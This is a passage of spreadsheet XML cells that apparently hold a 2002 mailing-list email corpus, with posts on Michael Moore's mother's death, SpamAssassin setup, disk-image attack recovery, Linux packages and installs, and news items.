airport personnel are taking everything out of my suitcase for\ninspection. They don't ask to see the print of the film, the only thing I\nmight have had on me that is poised to do any real damage (to all the right\npeople, of course). My dad and I stop short of the metal detectors and the\nnext round of inspectors who are anxious to look at my smelly feet. We hug,\nand he kisses me, and I am trying hard, so very hard, to not break down in\nthe middle of this airport. He tells me not to worry about him, and I tell\nhim I'll call him from Detroit when I am changing planes. I go through\nsecurity and as I am being taken aside to be searched again, I look back\nand see him still standing there, watching out for me. My dad.\n\nI'm on the plane and I'm thirsty, but I took the water bottle out of my bag\nwhen I packed it this morning. The bottle, half-drank, had been sitting\nuntouched in my untouched bag since I stuck it in there the night we had to\nrush my mom to the hospital. The bottle was still there in that overnight\nbag where I put my t-shirt and sweatpants, the ones I had on for the night\nand day I sat by my mother's side in the hospital as she struggled to live,\nholding her hand, holding her head, trying to comfort her, strands of hair\non my sweater. I can see the stains from where my tears and mucus ran\nuncontrollably down my face and onto that sweater. The doctor said she had\nan 80% chance of making it. An hour before she died, another doctor said\nthe chances were 1 in 100. That was good enough for me. One in one hundred!\nI've had those odds! I won! Don't let her die! Please do everything you can\ndo! Don't let her die.\n\nThe priest came, then another priest came, and when the priests left my dad\nasked us three kids and the three grandkids to all join hands and say our\ngoodbyes to mom, say whatever we wanted to about what she meant to us. (I\nam sorry... I cannot complete this paragraph right now, I can't see the\nscreen through the tears...maybe someday...)\n\nThe night before we rushed her to the hospital I had a little surprise\nplanned for her. I had brought a copy of my new movie and I was going to\nshow it to her. As the end credits would roll, she would get to see what\nshe has seen at the end of all of my work: her name along with my dad's in\nthat list of credits...and, to me, it's the only real credit that ever\nmattered -- because without them I would not have the life they gave me,\nthe way they raised me... it is all a privilege I will never cease being\nthankful for.\n\nI never got to show her the movie that night. "Mike!" she called out from\nthe porch, in a pitch of voice I had never heard. "Get your father! I don't\nfeel good." She was, without warning, dying. Within 48 hours she would be\ngone.\n\n                 *          *          *          *          *          *\n\nI'm walking through the Detroit airport to gate 75 for the flight to\nDenver, and I hear someone say, "OK, Mr. Stuckup, just walk right on by!" I\nturn to see it is one of anchors from the local TV station in Flint. I\napologize. My sunglasses are on. I have been crying since I left my dad at\nthe Flint airport. I explain this to her and she starts to get tears in her\neyes. "My mom died in October," she says, and I realize that this pain that\nfeels so solitary is, truthfully, a shared experience amongst us all. No\none is immune from this loss. But instead of taking the time to tell me\nabout how rough it has been for HER, she asks about how I am doing and how\nis my dad doing and did we get the flowers she and the others sent. She\ngives me her number and says to call anytime if I feel the need to talk. At\nthat moment I remember what she told me -- that her mother also died this\nyear-- and I think, man, get over yourself, Mike, you are not alone in\nthis, and so I ask her how she is doing. "I think a lot," she says, "about\nall the things she won't see my two children grow up to do, to be. But I\nbelieve she is in my heart, right here, right now, and she will see it\nall."\n\nThey call my flight and I rush over to the payphone to call my dad to see\nif he got home OK. He tells me that when he left the short- term lot he got\ntalking to the person in the tollbooth who told him about her mother\ngetting cancer and how she was caring for her. "She said that her bill in\nthe hospital came to $60,000," he says with astonishment. "They won't be\nable to pay it. She makes six dollars an hour, no health insurance. I gave\nher a tip along with the toll."\n\n"You gave the tollbooth worker a tip?"\n\n"Well, you have to. That person could be you or me."\n\nThat is my father. That was my mother. \n\nYours, \n\nMichael Moore\nmike@michaelmoore.com\n[URL]http://www.michaelmoore.com[/URL]\n\nPS. Thank you, all of you, who sent me your condolences and who contributed\nto the local poverty program in my mother's name. I was so moved by your\ngenerosity and by your words of love and kindness. It will never be\nforgotten.\n\n\n---\n\nIf you wish to be be unsubscribed from this mailing list, please click the\nlink below and follow the instructions.\n\n[URL]http://www.michaelmoore.com[/URL]</t>
  </si>
  <si>
    <t>http://www.michaelmoore.com http://www.michaelmoore.com</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: lucas@gonze.com\nDate: Wed, 4 Sep 2002 16:27:56 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 16:27:56 -0400 (EDT)</t>
  </si>
  <si>
    <t>lucas@gonze.com</t>
  </si>
  <si>
    <t>FoRK &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>whoa</t>
  </si>
  <si>
    <t>This just blew my mind:\n[URL]http://www.earthviewer.com[/URL]\n\nThe detail of my neighborhood -- even my building -- is unbelievable.</t>
  </si>
  <si>
    <t>http://www.earthviewer.com</t>
  </si>
  <si>
    <t>CHN</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Adrian Hill" &lt;zendog_moo@hotmail.com&gt;\nDate: Wed, 4 Sep 2002 16:20:25 +0100</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 16:20:25 +0100</t>
  </si>
  <si>
    <t>"Adrian Hill" &lt;zendog_moo@hotmail.com&gt;</t>
  </si>
  <si>
    <t>spamassassin-talk@example.sourceforge.net</t>
  </si>
  <si>
    <t>[SAtalk] Re: Custom actions for high scoring spam</t>
  </si>
  <si>
    <t>Thank you Lars for your reply to my query.\n\n&gt; SA doesnt do any of these. It is probably a function of whatever scanning\nsystem/MDA\n&gt; you're using (amavis, procmail, whatever). What exactly are you using?\n\nI am using SpamAssassin as part of the MailScanner package (using sendmail\nas the MTA). It integrates nicely in there, and shares a configuration file\nwith SA. All very neat.\n\n&gt; SA in itself does nothing really. You need a frontend (procmail, amavis,\netc)\n&gt; at some point in the  mail delivery chain that can hand over the message\n&gt; to SA and do whatever other processing you want.\n\nI thought that SA rated a message with a certain score, then did a certain\naction (such as store | deliver | delete) based on the configuration given.\nI was hoping there were some other actions that I could custom-program in.\n\nAgain, many thanks,\n\n\nAdrian\n\n\n\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https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "'bmord@icon-nicholson.com'" &lt;bmord@icon-nicholson.com&gt;,\nFrom: "Everhart, Glenn (FUSA)" &lt;GlennEverhart@firstusa.com&gt;\nDate: Wed, 4 Sep 2002 15:11:55 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 15:11:55 -0400</t>
  </si>
  <si>
    <t>"Everhart, Glenn (FUSA)" &lt;GlennEverhart@firstusa.com&gt;</t>
  </si>
  <si>
    <t>"'bmord@icon-nicholson.com'" &lt;bmord@icon-nicholson.com&gt;,</t>
  </si>
  <si>
    <t>RE: use of base image / delta image for automated recovery from a</t>
  </si>
  <si>
    <t>I did something crudely along those lines for VMS VAX maybe 13 years\nago; there is at least one product that does it for PC though I don't\nrecall its name. It is also handy for cases where you have a CD image\nof some filesystem (or some other image of a filesystem) that is\nintrinsically readonly but whose filesystem will not accept (or is\nnot graceful) readonly storage. It is also more or less necessary\nif you want to work with WORM file structures, which are older still.\nThere have been a number of filesystems for those dating back to the\nearly 1980s if not before.\n\nA generic facility of the type you mention is also one way to implement\nsnapshots on top of an existing filesystem. The written information\nmust (obviously!) be seekable so you can provide the illusion that you\nwrote to the storage. A device level implementation is however perfectly\nadequate.\n\nIt does not, of course, distinguish for you what should have been changed\nand what should not. If you truly know a device (or perhaps a partition)\nmust not be written, it can be simpler to either return error on writes,\nor to just return a fake success on writes yet discard the data. (NTFS\nlives with the latter strategy just fine from my experiments. I have not\ntried it on extf3 or reiser.) \n\nBTW, think about your mention of RAID and consider the complexity of\nwriting to RAID4 or RAID5...\nI would contend that with cheaper storage these days, it makes little sense\nto use RAID, save for shadowing and possibly striping. Those at least do\nnot have the complexity and slowup dangers that higher RAID levels have, and\nthere is not a need to save the cost of disk so much where a single disk\nmay hold 200 gigs and up. Why not dedicate another whole disk to fault\nrecovery\nand lose the complexity and slow write (sometimes) of RAID?\n\nGlenn Everhart\n\n\n-----Original Message-----\nFrom: bmord@icon-nicholson.com [mailto:bmord@icon-nicholson.com]\nSent: Tuesday, September 03, 2002 3:04 PM\nTo: Webappsec Securityfocus.Com; SECPROG Securityfocus\nSubject: use of base image / delta image for automated recovery from\nattacks\n\n\nHi,\n\nI was inspired by a mode of operation supported by VMWare. You can have a\nbase disk image shared by multiple virtual machine (vm) instances. That base\nimage is never altered by a vm instance. Instead, each vm instance writes\nchanges to its own "redo" log. Future hard disk reads from that vm instance\nincorporate both the base image and the appropriate redo log to present the\ncurrent disk image for that specific virtual machine.\n\nThis is described here (thanks to Duane for providing this link on the\nhoneypots mailing list)\n[URL]http://www.vmware.com[/URL]\n\nCould this basic concept be used to easily make self-fixing client/server\napplications that efficiently and automatically recover from most attacks,\neven before those attacks have been discovered? Here is what I imagine.\n\nThe physical architectures of most production client/server systems are\nlayered. For example, your basic web application might have a web server\nrunning Apache, connected to an application server running some J2EE or .Net\nbusiness logic, connected to a database server for persistence. The only one\nof these whose disk image really should evolve over time is the database\nserver, and even here you often put the static RDBMS software on one\npartition and the changeable datafiles on another partition. It is only the\npartition with the volatile datafiles that must be allowed to change from\none boot to the next. Other paritions may need to be writable for, say, swap\nspace, but these changes could be eliminated on each reboot.\n\nWhen someone cracks this system, they will probably change an image that\nshouldn't be changed. E.g., they might leverage a buffer overflow in IIS or\nApache to install a trojan or a backdoor on the more exposed web server. But\nwhat if the web server ran off a base image, writing changes to a "delta" or\n"redo" partition? And then what if every night it automatically erased the\nredo partition and rebooted? The downtime involved for each machine would be\nminimal, because it is only deleting data - rather than restoring from\nbackup. In a system with redundant web servers for load balancing or high\navailability, this could be scheduled in a way such that the system is\nalways accessible. This base/redo partition concept could be implemented at\nthe same level as a feature of hardware RAID, allowing for greater\nperformance, reliability, and hack resistance. This concept could also be\napplied to the application servers, and even the database server partitions\n(except for those partitions which contain the table data files, of course.)\n\nDoes anyone do this already? Or is this a new concept? Or has this concept\nbeen discussed before and abandoned for some reasons that I don't yet know?\nI use the physical architecture of a basic web application as an example in\nthis post, but this concept could of course be applied to most server\nsystems. It would allow for the hardware-separation of volatile and\nnon-volatile disk images. It would be analogous to performing nightly\nghosting operations, only it would be more efficient and involve less (or\nno) downtime.\n\nThanks for any opinions,\nBen\n\n\n**********************************************************************\nThis transmission may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you\n**********************************************************************</t>
  </si>
  <si>
    <t>http://www.vmware.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Doug Stewart &lt;zamoose610@yahoo.com&gt;\nDate: Wed, 4 Sep 2002 12:00:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 12:00:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Doug Stewart &lt;zamoose610@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Fluxbox</t>
  </si>
  <si>
    <t>I've noted that there are packaged versions of Blackbox and hackedbox available from FreshRPMs.  What about FluxBox? [URL]http://fluxbox.sf.net[/URL] I'd certainly enjoy a packaged version, since its creators seem hesitant to provide .rpms (.debs, yes, but no .rpms). .Doug __________________________________________________ Do You Yahoo!? Yahoo! Finance - Get real-time stock quotes [URL]http://finance.yahoo.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://fluxbox.sf.net http://finance.yahoo.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Bill Sobel" &lt;bsobel@vipmail.com&gt;\nDate: Wed, 4 Sep 2002 11:34:44 -0700</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 11:34:44 -0700</t>
  </si>
  <si>
    <t>"Bill Sobel" &lt;bsobel@vipmail.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Windows port / bug reports?</t>
  </si>
  <si>
    <t>Hi,\n\nNewbie (to the list) question;  I've been working on porting the code to\nrun under Perl on Windows.  The changes are fairly minor and can be made\nto interoperate with the current code.  How would one best go about\ngetting those changes merged in (better question, would there be\ninterest in such a version and getting those changes merged in)?\n\nBill\n\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;, fork@spamassassin.taint.org\nFrom: sateesh narahari &lt;sati_home@yahoo.com&gt;\nDate: Wed, 4 Sep 2002 09:55:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 09:55:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>sateesh narahari &lt;sati_home@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Tom &lt;tomwhore@slack.net&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: Kill Your Gods</t>
  </si>
  <si>
    <t>Hindus got 3 billion gods..... So, losing one is no big deal, really.... Its just sick that they killed an innocent animal, which doesn't even know the concept of "God". Sateesh --- Tom  wrote: &gt; Hindus mourn 'monkey god' &gt;  &gt;  &gt; By Omer Farooq &gt; BBC reporter in Hyderabad &gt;  &gt; Hundreds of people have attended the funeral of a &gt; monkey which became &gt; revered as a divine incarnation of a Hindu god in &gt; the southern Indian &gt; state of Andhra Pradesh. &gt;  &gt;  &gt; The monkey was quite old and both its hind legs were &gt; paralysed &gt;  &gt; Animal rights campaigners say the monkey died of &gt; starvation and exhaustion &gt; after being trapped in a temple for a month by &gt; over-zealous worshippers. &gt;  &gt; The animal was cremated in Anantapur district, 400 &gt; kilometres (250 miles) &gt; south of the state capital, Hyderabad, on Sunday. &gt;  &gt; It had not eaten for three weeks. &gt;  &gt; Last rites were performed by priests in the village &gt; of Timmiganipally in &gt; the presence of hundreds of devotees who had come to &gt; believe that the &gt; monkey was a reincarnation of the Hindu monkey god, &gt; Hanuman. &gt;  &gt; Garlanded &gt;  &gt; One animal rights activist said his group's efforts &gt; to save the monkey had &gt; failed because of the blind faith of the people. &gt;  &gt;  &gt; The monkey's death came a day after he and others &gt; tried to move the animal &gt; out of the temple, but were prevented by villagers. &gt;  &gt; The monkey, which was found perched on top of an &gt; idol of Hanuman a month &gt; ago, attracted hundreds of devotees every day from &gt; surrounding villages, &gt; as well as from the neighbouring state of Karnataka. &gt;  &gt; Devotees showered the monkey with fruit and flowers &gt; and worshipped it &gt; around the clock. &gt;  &gt; 'Exploited' &gt;  &gt; Locals said they believed that Lord Hanuman was &gt; visiting the village, as &gt; the temple had stopped daily rituals after a dispute &gt; between two groups of &gt; residents. &gt;  &gt; But animal rights campaigners complained that the &gt; animal was being &gt; mistreated. &gt;  &gt; They filed a petition in the state's High Court &gt; saying the monkey had been &gt; forcibly confined in the temple. &gt;  &gt; The group also alleged that people's religious &gt; feelings were being &gt; exploited to make money. &gt;  &gt; The court then ordered the local administration to &gt; rescue the monkey - but &gt; villagers prevented officials from taking him for &gt; treatment in time. &gt;  &gt;  &gt;  __________________________________________________ Do You Yahoo!? Yahoo! Finance - Get real-time stock quotes [URL]http://finance.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://finance.yahoo.com</t>
  </si>
  <si>
    <t>FRA</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Wed, 4 Sep 2002 08:48:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 08:48:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>EPA Stunned: Diesel Exhaust Can Cause Cancer</t>
  </si>
  <si>
    <t>Glad they finally figured this one out... Note the very careful wording, so\nexhaust may be beneficial to ones health as long as you have a glass a day\nwith some cheese.\n\nInteresting timing, since 16,000 truckers just lost their jobs and dont have\nto worry about death from this anymore.\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n--------\n\nEPA: Diesel Exhaust Can Cause Cancer\nWed Sep 4, 3:29 AM ET\nBy H. JOSEF HEBERT, Associated Press Writer\n\nWASHINGTON (AP) - Inhaling diesel exhausts from large trucks and other\nsources over time can cause cancer in humans, an Environmental Protection\nAgency ( news - web sites) report concludes after a decade of study.\n\nThe EPA finding, released Tuesday, is expected to buttress the government's\npush to reduce truck tailpipe emissions by requiring cleaner-burning engines\nand diesel fuel with ultra-low sulfur content.\n\nWhile acknowledging uncertainties about the long-term health effects of\nexposure to diesel exhausts, the EPA report said studies involving both\nanimal tests and occupational exposure suggest strong evidence of a cancer\nrisk to humans.\n\n"It is reasonable to presume that the hazard extends to environmental\nexposure levels" as well, the report said. "The potential human health\neffects of diesel exhausts is persuasive, even though assumptions and\nuncertainties are involved."\n\nThe report mirrors conclusions made previously in documents from various\nworld health agencies and studies in California and is particularly\nsignificant because the EPA is the federal agency that regulates diesel\nemissions under the Clean Air Act.\n\nSome environmentalists have raised concerns recently that the Bush\nadministration might try to back away from a Clinton-era regulation that\nwould establish tougher requirements on emissions from large trucks and a\nseparate rule that virtually would eliminate sulfur from diesel fuel.\n\nEPA Administrator Christie Whitman repeatedly has promised to go ahead with\nthe tougher truck and diesel rules. Last month, with White House approval,\nthe EPA rebuffed attempts by some diesel engine manufacturers to postpone\nthe requirements, approving new penalties against manufacturers who fail to\nmeet an October deadline for making cleaner-burning truck engines.\n\nThe engine rule does not affect emissions from trucks already on the road,\nalthough the separate regulation cutting the amount of sulfur in diesel fuel\nis expected to produce pollution reductions.\n\nThe EPA's 651-page diesel health assessment did not attempt to estimate the\nprobability of an individual getting cancer, given certain exposure to\ndiesel exhaust. Such a risk assessment is commonly made by the EPA when\ngauging pollution health concerns.\n\nBut in this case, the report said, "the exposure-response data are\nconsidered too uncertain" to produce a confident quantitative estimate of\ncancer risk to an individual.\n\nNevertheless, said the report, the "totality of evidence from human, animal\nand other supporting studies" suggests that diesel exhaust "is likely to be\ncarcinogenic to humans by inhalation, and that this hazard applies to\nenvironmental exposure."\n\nThe report reiterated that environmental exposure to diesel exhausts poses\nshort-term health problems and in the long term has been shown to be a\n"chronic respiratory hazard to humans" contributing to increased asthma and\nother respiratory problems. In some urban areas diesel exhausts account for\nas much as a quarter of the airborne microscopic soot, the report said.\n\nEnvironmentalists welcomed the study as clear evidence that pollution needs\nto be curtailed not only from large trucks but also from off-road\ndiesel-powered vehicles. EPA spokeswoman Steffanie Bell said the agency\nexpects to publish a rule early next year dealing with those diesel exhaust\nsources, which include farm tractors and construction equipment.\n\nEmily Figdor of the U.S. Public Interest Research Group, a private\nenvironmental organization, said: "To reduce the public's exposure to\nharmful diesel emissions, the Bush administration should ... fully implement\nclean air standards for diesel trucks and buses and should pass equivalent\nstandards for diesel construction and farm equipment."\n\nAllen Schaeffer, executive director of the industry group Diesel Technology\nForum, said the EPA's report "focused on the past," whereas "the future is\nclean diesel. Diesel trucks and buses built today are more than eight times\ncleaner than just a dozen years ago."\n\nThe report acknowledged that its findings were based on emissions levels in\nthe mid-1990s, but said the results continued to be valid because the slow\nturnover of truck engines has kept many of these vehicles on the road.</t>
  </si>
  <si>
    <t>http://www.mithral.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: che &lt;che666@uni.de&gt;\nDate: Wed, 4 Sep 2002 07:55:04 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 07:55:04 -0400</t>
  </si>
  <si>
    <t>che &lt;che666@uni.de&gt;</t>
  </si>
  <si>
    <t>d4x 2.03 package</t>
  </si>
  <si>
    <t>Hello! i have just found a small issue with the downloader 4 x update. the ftp search engines are missing something like: %{_datadir}/d4x/ftpsearch.xml  thanks in advance, che p.s. i love the xmms-xosd plugin :) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nDate: Wed, 4 Sep 2002 06:52:07 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 06:52:07 -0400</t>
  </si>
  <si>
    <t>Yannick Gingras &lt;ygingras@ygingras.net&gt;</t>
  </si>
  <si>
    <t>secprog@securityfocus.com</t>
  </si>
  <si>
    <t>Re: Secure Sofware Key</t>
  </si>
  <si>
    <t>&gt; Software vendors have been trying since forever to prevent software piracy.\n&gt; Remember when you had to enter a specific word from a specific page of the\n&gt; software manual, which was printed on dark maroon paper so that it could\n&gt; not be photocopied?  Didn't work.  Propritery encoding of DVD's?  Didn't\n&gt; work. Software that required the use of a registration key?  Didn't work. \n&gt; Windows XP was shipped with this supposedly revolutionary method for\n&gt; stopping piracy, and what happened?  How long was it before the code was\n&gt; cracked? How many keygens are there for Windows XP?  Is someone running a\n&gt; pirated version of XP really going to use Windows Update to installed a\n&gt; service pack which breaks their OS?  Just because M$ didn't include the\n&gt; change in their README?  Fat chance.\n\nMy problem is not the same as MS's one, I don't have to deal with millions of \nidentical copy of the same CD with propably millions of working keys.  Each \ndownload can be unique with a small preparation delay.  The key generator is \na problem only if multiple keys are usable.  If the end users are teenagers, \nyou'll face a huge wall when asking to be 100% of the time online but if we \nthink of something like a health care system that keep track of patients \npersonnal information, the end user will be willing to take every possible \nsteps to protect the system from his own employees to use illegaly.\n\nI agree with all of you that mass production CDs will not be safe from piracy \nin a near futur.  That can be seen as a collateral of mass market \npenetration.\n\nBTW thanks for all of you who provided interestiong insight.  I'm playing with \ngdb's dissassembler now but I don't think it's what a typical cracker would \nuse.  Any hints on UNIX cracking tools ?\n\nThanks.\n\n-- \nYannick Gingras\nCoder for OBB : Onside Brainsick Bract\n[URL]http://OpenBeatBox.org[/URL]</t>
  </si>
  <si>
    <t>http://OpenBeatBox.org</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 4 Sep 2002 01:08:58 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 01:08:58 -0400</t>
  </si>
  <si>
    <t>Re: Electric car an Edsel...</t>
  </si>
  <si>
    <t>--- begin forwarded text From: A guy who models plasma all day... To: "R. A. Hettinga"  Subject: Re: Electric car an Edsel... Date: Tue, 3 Sep 2002 22:49:20 -0600 Bob, This capacitor drive idea isn't completely stupid, but neither is it well thought out. Maxwell ([URL]www.maxwell.com[/URL] makes and sells high energy density capacitors, called ultracapacitors.  They deliver them in an air-cooled, voltage regulated module that will charge to 42 V and hold 128 kilojoules -- roughly the energy in 2 teaspoons of sugar or a bite of a donut -- and weighs 16 kilograms.  If that electrical energy could all be converted to kinetic energy, there's enough to get the capacitor module up to about 200 mph -- in a vacuum. Suppose you take the entire power density of the capacitor module -- 2.8 kw/kg (~4 hp/kg!) --  and punch it through an electric motor.  How much does the 64 hp electric motor weigh?  If it were as little as 50 kg -- and I bet it isn't -- that capacitor and motor would have a top speed of 100 mph -- the speed at which their energy is the 128 kJ that was initially stored electrically in the capacitor.  And it's not at all obvious that the torque vs. speed characteristic of 42 V DC motors will support this, or how they do it without wheels, drive train, etc. But if they can, they can only do it in a vacuum where there is no drag! On to the Lunarnationals?  Or would you prefer the bite of donut? ----- Original Message ----- From: "R. A. Hettinga"  To: "Vinnie Moscaritolo" ; "Randolph Elliott" ; ; "Duncan Goldie-Scot" ; "G. Gruff" ; Sent: Monday, September 02, 2002 11:15 PM Subject: Re: Electric car an Edsel... &gt; &gt; --- begin forwarded text &gt; &gt; &gt; Status: RO &gt; Delivered-To: fork@spamassassin.taint.org &gt; From: "Adam L. Beberg"  &gt; To: RossO  &gt; Cc:  &gt; Subject: Re: Electric car an Edsel... &gt; Sender: fork-admin@xent.com &gt; Date: Mon, 2 Sep 2002 21:24:47 -0700 (PDT) &gt; &gt; On 2 Sep 2002, RossO wrote: &gt; &gt; &gt; John Waylan (who was interviewed in Wired a few years back) pulled out a &gt; &gt; 14.4 second run in the quarter mile (91mph), on a battery pack that &gt; &gt; hasn't been broken in yet. He expects to break his record next year &gt; &gt; topping his 13.1sec/99mph run a couple of years ago. He's shooting for a &gt; &gt; 12 second run. &gt; &gt; Battery pack, huh what??? &gt; &gt; You dont use batteries for a 1/4 mile run, you use capacitors. MANY times &gt; the energy density, and you can get the energy out fast enough. Note that &gt; the battery packs are fully swapped out for recharging after each run &gt; anyway, just like a gas dragster is refueled, so this wouldnt be cheating. &gt; 200 MPH should be no problem. &gt; &gt; - Adam L. "Duncan" Beberg &gt;   [URL]http://www.mithral.com[/URL] &gt;   beberg@mithral.com &gt; &gt; --- end forwarded text &gt; &gt; &gt; -- &gt; ----------------- &gt; R. A. Hettinga  &gt; The Internet Bearer Underwriting Corporation  &gt; 44 Farquhar Street, Boston, MA 02131 USA &gt; "... however it may deserve respect for its usefulness and antiquity, &gt; [predicting the end of the world] has not been found agreeable to &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' &gt;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www.maxwell.com http://www.mithral.com</t>
  </si>
  <si>
    <t>To: "'ILUG@linux.ie'" &lt;ILUG@linux.ie&gt;\nFrom: Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;\nDate: Wed, 4 Dec 2002 11:54:45 +0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 11:54:45 +0000</t>
  </si>
  <si>
    <t>Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;</t>
  </si>
  <si>
    <t>"'ILUG@linux.ie'" &lt;ILUG@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Linux Install</t>
  </si>
  <si>
    <t>Hi,\n\nI think you need to give us a little more detailed information.\n\nOn Wed, 04 Dec 2002, Gianni Ponzi wrote:\n\n&gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my\n&gt; laptop. \n\nYou get _exactly_ the same problem with Suse and RedHat, is that right?\nWhat versions of these have you used?\n\n&gt; I can start the install but after about 2min, the whole pc just\n&gt; dies.\n\nAs in freezes, reboots?  Do you get any errors?\n\n&gt; I know it's not a Linux prob and here is what I have encountered:\n&gt; \n&gt; I had the same problem when installing Win on it and eventually sorted it\n&gt; out by disabling the infrared port. \n\nDid you disable it in the BIOS or in windows?\n\n&gt; I'm guessing this might be same prob although I'm not sure. I am very new\n&gt; to Linux so it's not that easy for me to work it out. I did manage to\n&gt; follow the setup procedure at one stage (using images on disks) and it\n&gt; cuts out either as it's trying to verify what CD-Rom I have or just after\n&gt; (hence my suspicion of the infrared port again).\n\n1. What laptop is it?  What is the Processor and how much RAM does it have?\n\n2. You cannot simply boot off the cdrom?  It must be quite an old laptop\nthen or else cdrom booting is disabled in the BIOS.  Is the cdrom external\nor strange in some way?\n\nGavin\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Wed, 4 Dec 2002 11:40:18 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 11:40:18 -0000</t>
  </si>
  <si>
    <t>"Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;</t>
  </si>
  <si>
    <t>"'ilug@linux.ie'" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] Linux Install</t>
  </si>
  <si>
    <t>&gt; I had the same problem when installing Win on it and eventually sorted it\n&gt; out by disabling the infrared port. \n\nEnter your bios and try disabling your infrared port in the bios.\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ILUG@linux.ie'" &lt;ILUG@linux.ie&gt;\nFrom: Gianni Ponzi &lt;g.ponzi@epa.ie&gt;\nDate: Wed, 4 Dec 2002 11:36:16 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 11:36:16 -0000</t>
  </si>
  <si>
    <t>Gianni Ponzi &lt;g.ponzi@epa.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Linux Install</t>
  </si>
  <si>
    <t>Hi all\n\n\nI have a prob when trying to install Linux (tried RedHat, Suse) on my\nlaptop. I can start the install but after about 2min, the whole pc just\ndies.\nI know it's not a Linux prob and here is what I have encountered:\n\nI had the same problem when installing Win on it and eventually sorted it\nout by disabling the infrared port. I'm guessing this might be same prob\nalthough I'm not sure. I am very new to Linux so it's not that easy for me\nto work it out. I did manage to follow the setup procedure at one stage\n(using images on disks) and it cuts out either as it's trying to verify what\nCD-Rom I have or just after (hence my suspicion of the infrared port again).\n\ncan anyone help ?\n\nthanks\nGianni\n\n\n************************************************************************\nThis e-mail and any files transmitted with it are confidential\nand intended solely for the use of the individual or entity to\nwhich they are addressed. If you have received this e-mail\nin error, please notify the EPA postmaster - postmaster@epa.ie\n\nThe opinions contained within are personal to the sender and \ndo not necessarily reflect the policy of the Environmental \nProtection Agency.\n\nThis footnote also confirms that this e-mail message has been\nswept by MIMEsweeper for the presence of computer viruses.\n\n************************************************************************\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Carlos Luna" &lt;carlos.luna@steorn.com&gt;\nDate: Wed, 4 Dec 2002 11:20:29 -0000</t>
  </si>
  <si>
